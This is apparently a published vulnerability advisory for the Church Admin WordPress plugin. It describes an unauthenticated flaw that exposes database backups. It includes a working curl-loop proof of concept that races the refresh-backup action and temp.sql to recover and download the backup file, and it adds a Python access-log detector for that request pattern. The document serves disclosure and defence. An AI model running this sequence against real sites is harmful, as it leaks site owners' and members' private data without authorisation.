WordPress Plugin Vulnerabilities
Church Admin < 3.4.135 - Unauthenticated Plugin's Backup Disclosure
Description
The plugin does not have authorisation and CSRF checks in some of its actions, nor on some of the files it serves. This allows unauthenticated attackers to repeatedly request the "refresh-backup" action while simultaneously requesting a publicly accessible temporary file generated by the plugin, in order to disclose the final backup filename. The attacker can then fetch that file to download the backup of the plugin's DB data.
Proof of Concept
1. In one terminal, continuously request the refresh-backup action:
   while true; do curl -s 'http://127.0.0.1:8080/?action=refresh-backup' >/dev/null; done
2. In a second terminal, continuously fetch the temporary file /wp-content/uploads/church-admin-cache/temp.sql and grep it for the backup filename:
   while true; do curl -s http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/temp.sql | grep '\.sql\.gz'; done
3. After a while, the curl | grep command in the second terminal should print the backup filename. Once it does, abort the command in the first terminal, then the one in the second terminal, and use the last output of the second terminal as the filename (<md5-hash>.sql.gz).
4. Download the backup by accessing it via http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/<extracted-md5-hash>.sql.gz
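The request pattern described above leaves a clear trace in ordinary web-server access logs. The following Python is an added example written for this page, not code from the advisory or from the plugin: it counts, per client address, successful requests for the refresh-backup action, for the temp.sql file and for a 32-hex-character .sql.gz archive under the cache directory, and flags clients that poll both endpoints or retrieve an archive. The common-log-format layout, the thresholds and the sample log lines are assumptions constructed for the example.

```python
import re
from collections import defaultdict

# Assumed thresholds (not from the advisory): one client hitting both the
# refresh-backup action and temp.sql this many times is treated as polling.
REFRESH_THRESHOLD = 2
TEMP_THRESHOLD = 2
# Constructed sample access-log lines in common log format; not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Mar/2022:10:00:01 +0000] "GET /?action=refresh-backup HTTP/1.1" 200 12
203.0.113.7 - - [07/Mar/2022:10:00:01 +0000] "GET /wp-content/uploads/church-admin-cache/temp.sql HTTP/1.1" 200 512
203.0.113.7 - - [07/Mar/2022:10:00:02 +0000] "GET /?action=refresh-backup HTTP/1.1" 200 12
203.0.113.7 - - [07/Mar/2022:10:00:02 +0000] "GET /wp-content/uploads/church-admin-cache/temp.sql HTTP/1.1" 200 512
203.0.113.7 - - [07/Mar/2022:10:00:03 +0000] "GET /wp-content/uploads/church-admin-cache/0123456789abcdef0123456789abcdef.sql.gz HTTP/1.1" 200 88112
192.0.2.3 - - [07/Mar/2022:10:00:05 +0000] "GET /?action=refresh-backup HTTP/1.1" 200 12
198.51.100.9 - - [07/Mar/2022:10:00:06 +0000] "GET /wp-admin/admin.php?page=church_admin HTTP/1.1" 200 4096
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
BACKUP_RE = re.compile(r'/church-admin-cache/[0-9a-f]{32}\.sql\.gz$')

def parse_line(line):  # -> dict of fields, or None when the line does not parse
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(path):  # which step of the disclosure chain a request path matches
    if 'action=refresh-backup' in path:
        return 'refresh'
    if path.endswith('/church-admin-cache/temp.sql'):
        return 'temp'
    return 'backup_download' if BACKUP_RE.search(path) else None

def detect(log_text):  # -> {ip: [reasons]} for clients whose requests fit the chain
    counts = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec['status'].startswith('2'):
            continue  # unparseable or unsuccessful requests carry no signal here
        kind = classify(rec['path'])
        if kind:
            counts[rec['ip']][kind] += 1
    findings = {}
    for ip, c in counts.items():
        reasons = []
        if c['refresh'] >= REFRESH_THRESHOLD and c['temp'] >= TEMP_THRESHOLD:
            reasons.append('polling refresh-backup and temp.sql')
        if c['backup_download']:
            reasons.append('downloaded %d backup archive(s)' % c['backup_download'])
        if reasons:
            findings[ip] = reasons
    return findings
```

On the constructed sample, detect(SAMPLE_LOG) flags only 203.0.113.7, for both polling and a completed archive download; a single refresh-backup request from another client is not enough on its own.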
Classification
Type: NO AUTHORISATION
Miscellaneous
Original Researcher: cydave
Submitter: cydave
Verified: Yes
Timeline
Publicly Published: 2022-03-07
Added: 2022-03-07
Last Updated: 2022-04-08